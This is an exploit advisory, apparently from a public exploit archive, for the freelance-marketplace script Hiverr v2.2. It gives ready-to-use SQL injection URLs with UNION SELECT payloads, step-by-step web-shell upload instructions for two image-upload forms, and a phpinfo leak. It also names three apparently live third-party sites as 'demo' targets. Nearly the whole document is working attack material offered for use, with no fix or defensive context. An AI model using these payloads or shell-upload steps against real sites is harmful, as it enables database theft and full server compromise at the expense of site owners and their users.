# Exploit Title: Hiverr v2.2 Multiple Vulnerabilities # Date: 05.02.2013 # Author: xStarCode # Exploit Author: xStarCode # Version: 2.2 # Category: webapps # Google Dork: * # Tested on: Linux # Exploit: -----Index Vulnerabilities: ==> SQL Injections http://localhost/gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11-- http://localhost/categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7-- http://localhost/categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11-- <== -----User Panel Vulnerabilities: ==> SQL Injection http://localhost/inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8-- <== -----Multiple Shell Upload: ==> Go to http://localhost/profilesetting.php And upload a PHP Shell to "Profile Image" View source: <img src="profileimage/*****SHELL*****_.php" alt="image" height="100" width="100"> Go to http://localhost/profileimage/*****SHELL*****_.php <== next - ==> Go to "Greate Gig" http://localhost/addnewgig.php And upload a PHP Shell to "Add Image" View source: <td width="107"> <img src="gigimages/*****SHELL*****_.php" height="76" width="106"> </td> Go to http://localhost/gigimages/*****SHELL*****_.php <== -----PHP Info Leak: ==> Go to http://localhost/nitintest.php <== # Demo sites: http://trabajoenlinea.net/ http://aramar.jp/ http://www.seostinger.com/ # ______ Xo | | / | \ ;_/,X_,\_; \._/x x\_./ \_./(::)\._/ ___ xStarCode # Author Mail: xstarcode@vpn.st Author Website: www.xstarcode.wordpress.com #Брой прочитания на тази страница: 968
Hiverr v2.2 – Multiple Vulnerabilities